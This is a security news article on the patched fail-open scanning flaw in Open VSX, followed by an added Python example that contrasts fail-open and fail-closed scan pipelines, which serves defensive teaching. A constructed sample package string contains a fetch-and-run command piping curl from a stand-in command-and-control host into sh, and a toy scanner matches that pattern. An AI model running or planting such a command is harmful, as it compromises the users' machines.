Researchers have disclosed a security vulnerability in the Open VSX pre-publish scanning tool that has since been patched. The flaw allowed malicious Microsoft Visual Studio Code (VS Code) extensions to bypass the security screening and be published to the registry. In a report shared with The Hacker News, Koi Security's Oran Simhony said the issue stemmed from the scanning pipeline returning a single boolean value that could not distinguish between "no scanners configured" and "all scanners failed to execute."
Vulnerability Details and Impact
Last month, the Eclipse Foundation, which oversees Open VSX, announced new security checks for VS Code extensions to counter the threat of malicious extensions. Open VSX serves as the marketplace for Cursor, Windsurf, and other VS Code forks, so the checks were seen as an important step in securing that ecosystem. However, the flaw, dubbed "Open Sesame," caused extensions to be marked as having passed scanning even when the scanner jobs failed to run, leaving them downloadable from Open VSX.
The failure mode was triggered by database connection pool exhaustion: when the pool ran dry, scanner jobs could not be queued, and the absence of any scan result was interpreted as "nothing to scan" rather than "scan failed." A recovery service designed to retry failed scans suffered from the same misinterpretation, so under these conditions an extension could bypass the scan entirely instead of being retried.
Exploitation and Mitigation
Exploiting the vulnerability did not require special access: anyone with a free publisher account could use it to publish malicious extensions. By flooding the publish endpoint with VSIX packages, an attacker could exhaust the database connection pool and cause the scans to fail, at which point the uploads were treated as having passed. The Eclipse Foundation fixed the issue in Open VSX version 0.32.0 following responsible disclosure on February 8, 2026.
Koi Security noted that while pre-publish scanning is vital, the problem lay in the pipeline's design: a single boolean could not differentiate "no action required" from "action failed," so the check failed open whenever the infrastructure behind it was under stress.
Lessons and Future Outlook
The incident illustrates a common software design flaw: fail-open error handling disguised as a legitimate "nothing to do" result. Koi Security advises developers building similar pipelines to model failure states explicitly so that "no work needed" and "work failed" cannot be conflated. A pipeline that fails closed cannot be turned into a bypass simply by putting it under load.
As development workflows increasingly depend on extension marketplaces, the integrity of their publishing checks matters as much as the checks themselves. The prompt resolution of the Open VSX vulnerability is a reminder that security controls must also be tested for how they behave when the infrastructure they rely on fails.
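The following is an added example, not Open VSX's own code (Open VSX is a Java project; this is a standalone Python model of the design flaw described above and in the Koi Security findings). It places a pipeline that reduces scanning to one boolean, and therefore answers "publishable" when the scanner jobs cannot run, beside one that returns an explicit outcome and fails closed. The scanner functions, the `PoolExhausted` exception, the `ScanOutcome` states and the VSIX byte strings are all constructed for illustration and are not Open VSX APIs or real extensions.

```python
"""Fail-open vs fail-closed pre-publish scanning.

Added illustration, not Open VSX code. The scanners, the PoolExhausted
exception and the VSIX byte strings below are constructed stand-ins.
"""
from dataclasses import dataclass
from enum import Enum, auto
from typing import Callable, Sequence

# A scanner receives the raw VSIX bytes and returns True if it flags malware.
Scanner = Callable[[bytes], bool]


class PoolExhausted(RuntimeError):
    """Stand-in for the database connection pool running dry under load."""


# --- vulnerable shape: one boolean, so 'no results' looks like 'nothing to do'

def scan_vulnerable(vsix: bytes, scanners: Sequence[Scanner]) -> bool:
    """Return True when the extension may be published (fails open).

    A scanner job that cannot be queued is silently skipped, so an extension
    whose scans all failed produces the same answer as an extension for which
    no scanner was ever configured: True.
    """
    verdicts = []
    for scanner in scanners:
        try:
            verdicts.append(scanner(vsix))
        except PoolExhausted:
            pass  # job never queued; nothing recorded
    if not verdicts:
        return True  # indistinguishable from 'no scanners configured'
    return not any(verdicts)


# --- hardened shape: explicit outcome, publication policy decided separately

class ScanOutcome(Enum):
    CLEAN = auto()           # every configured scanner ran and found nothing
    FLAGGED = auto()         # at least one scanner flagged the extension
    FAILED = auto()          # at least one scanner could not run
    NOT_CONFIGURED = auto()  # no scanner configured: an explicit operator state


@dataclass(frozen=True)
class ScanResult:
    outcome: ScanOutcome
    ran: int = 0
    failed: int = 0


def scan_hardened(vsix: bytes, scanners: Sequence[Scanner]) -> ScanResult:
    """Run every scanner and report what actually happened."""
    if not scanners:
        return ScanResult(ScanOutcome.NOT_CONFIGURED)
    ran = failed = 0
    flagged = False
    for scanner in scanners:
        try:
            flagged = scanner(vsix) or flagged
            ran += 1
        except PoolExhausted:
            failed += 1
    if failed:
        return ScanResult(ScanOutcome.FAILED, ran, failed)
    return ScanResult(ScanOutcome.FLAGGED if flagged else ScanOutcome.CLEAN, ran, 0)


def may_publish(result: ScanResult, allow_unscanned: bool = False) -> bool:
    """Only CLEAN publishes. FAILED never does, and NOT_CONFIGURED only when
    an operator has explicitly opted in (the default is to refuse)."""
    if result.outcome is ScanOutcome.CLEAN:
        return True
    if result.outcome is ScanOutcome.NOT_CONFIGURED:
        return allow_unscanned
    return False


def needs_retry(result: ScanResult) -> bool:
    """What a recovery service should key on: the FAILED state itself,
    not the absence of a published verdict."""
    return result.outcome is ScanOutcome.FAILED


# --- constructed sample inputs (not real extensions)

MALICIOUS_VSIX = b"PK\x03\x04 extension.js: exec('curl http://c2.invalid/x | sh')"
BENIGN_VSIX = b"PK\x03\x04 extension.js: vscode.window.showInformationMessage('hi')"


def signature_scanner(vsix: bytes) -> bool:
    """Toy signature check standing in for a real malware scanner."""
    return b"| sh" in vsix


def exhausted_scanner(vsix: bytes) -> bool:
    """Models a scanner job that cannot obtain a database connection."""
    raise PoolExhausted("connection pool exhausted")


if __name__ == "__main__":
    for name, scanners in [("healthy", [signature_scanner]),
                           ("under load", [exhausted_scanner])]:
        vuln = scan_vulnerable(MALICIOUS_VSIX, scanners)
        hard = scan_hardened(MALICIOUS_VSIX, scanners)
        print(f"{name:10} vulnerable publishes={vuln}  "
              f"hardened outcome={hard.outcome.name} publishes={may_publish(hard)}")
```

Running the block shows the two pipelines agreeing while the scanner is healthy and diverging the moment it cannot run: the boolean version publishes the malicious package, the explicit-outcome version reports FAILED, refuses publication, and hands the job to the retry path. The point of `NOT_CONFIGURED` being its own state is that "no scanners" becomes a deliberate operator choice surfaced to policy, rather than a side effect that also swallows outages.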
